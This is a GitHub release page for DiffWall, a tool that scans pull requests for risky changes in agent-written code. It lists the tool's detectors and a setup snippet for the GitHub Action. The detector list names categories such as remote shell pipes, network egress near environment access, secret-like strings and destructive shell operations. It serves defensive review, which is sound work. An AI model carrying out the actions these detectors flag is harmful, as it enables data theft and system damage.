Skip to content

v0.1.0 — Action-first MVP

Latest

Choose a tag to compare

@dburt-proex dburt-proex released this 18 Jun 23:48

v0.1.1 — Action-first MVP update

First update runnable release of DiffWall: a deterministic PR risk firewall for agent-written code.

What’s included

  • GitHub Action wrapper: dburt-proex/diffwall/action@v0.1.0
  • Deterministic diff scanner
  • ALLOW / REVIEW / HALT routing model
  • Rule-based risk scoring
  • Markdown and JSON report output
  • Default policy file: rules/default.yml
  • CI workflow for install, build, test, and demo scan

Risk detectors included

  • Protected path changes
  • GitHub workflow changes
  • Auth/security/billing path changes
  • Secret-like strings
  • Dependency manifest changes
  • Package install scripts
  • Destructive SQL and shell operations
  • TLS verification disablement
  • Remote shell pipes
  • Network egress near environment access
  • Large diffs
  • Source changes without tests

Install

- name: Run DiffWall
  uses: dburt-proex/diffwall/action@v0.1.0
  with:
    base: origin/${{ github.base_ref }}
    head: HEAD
    config: rules/default.yml
    fail-on-halt: true